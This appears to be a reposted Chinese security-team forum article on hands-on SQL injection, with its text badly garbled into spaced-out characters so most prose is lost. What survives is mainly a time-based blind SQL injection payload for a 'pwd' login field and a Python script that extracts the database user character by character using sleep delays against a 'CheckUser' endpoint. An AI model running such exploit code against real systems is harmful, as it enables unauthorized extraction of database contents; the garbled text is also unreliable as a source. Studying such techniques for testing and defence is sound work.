[761] 2021-04-21_实战简单的sql注入与脚本的编写

文档创建者:s7ckTeam
浏览次数:12
最后更新:2025-01-16
2021-04-21_实战简单的sql注入与脚本的编写   |   s q l b g b i n g   2 0 2 1 - 0 4 - 2 1 F 1 2 s e c   s p a c e m a n   s p a c e m a n P a r t . 1   便 c c F 1 2 s e c   .
p w d m y s q l 使 s q l s q l m a p c c = 1 2 3 4 & p w d = 4 5 6 a n d   i f ( ( l e n g t h ( d a t a b a s e ( ) ) = 8 ) , s l e e p ( 5 ) , 0 ) ) + & k e y =
P a r t . 2   #   - * -   c o d i n g : u t f - 8   - * - i m p o r t   r e q u e s t s f r o m   r e q u e s t s   i m p o r t   e x c e p t i o n s u r l   =   ' h t t p : / / i p / C h e c k U s e r ' d e f   m a i n ( ) :         r e s u l t   =   " "         f o r   i   i n   r a n g e ( 1 ,   2 0 ) :                 l o w   =   3 2                 h i g h   =   1 2 8                 w h i l e   l o w   <   h i g h :                         m i d   =   i n t ( ( l o w   +   h i g h )   /   2 )                         c o n t e n t   =   " s e l e c t   u s e r ( ) "                         s q l   =   f " 1 2 3 ' a n d   i f ( ( a s c i i ( s u b s t r ( ( { c o n t e n t } ) , { i } , 1 ) ) < { m i d } ) , s l e e p ( 5 ) , 0 ) ) - -   "                         d a t a   =   {                                 " c c " : ' 1 2 3 4 5 6 ' ,                                 " p w d " :   s q l ,                                 " k e y " : ' '                         }                         h e a d e r s   =   { " U s e r - A g e n t " :   " M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ;   x 6 4 ;   r v : 8 7 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 8 7 . 0 " ,   " A c c e p t " :   " * / * " ,   " A c c e p t - L a n g u a g e " :   " z h - C N , z h ; q = 0 . 8 , z h - T W ; q = 0 . 7 , z h - H K ; q = 0 . 5 , e n - U S ; q = 0 . 3 , e n ; q = 0 . 2 "                         r   =   r e q u e s t s . p o s t ( u r l = u r l ,   d a t a = d a t a , h e a d e r s = h e a d e r s )                         i f   r . e l a p s e d . t o t a l _ s e c o n d s ( )   >   5 :                                 h i g h   =   m i d                         e l s e :                                 l o w   =   m i d   +   1                         p r i n t ( " [ + ]   A f t e r   c h a n g i n g   w e   g o t   { }   t o   { } " . f o r m a t ( l o w ,   h i g h ) )                 i f   l o w   = =   h i g h   = =   3 2 :                         p r i n t ( " [ * ]   R e s u l t   i s :   { } " . f o r m a t ( r e s u l t ) )                         b r e a k                 p r i n t ( " [ + ]   N o w   h a s   { } " . f o r m a t ( i ) )                 r e s u l t   + =   c h r ( i n t ( ( h i g h   +   l o w   -   1 )   /   2 ) )                 p r i n t ( " [ * ]   R e s u l t   n o w   i s :   { } " . f o r m a t ( r e s u l t ) ) i f   _ _ n a m e _ _   = =   ' _ _ m a i n _ _ ' :         m a i n ( )


您需要登录后才可以回帖 登录 | 立即注册

本版积分规则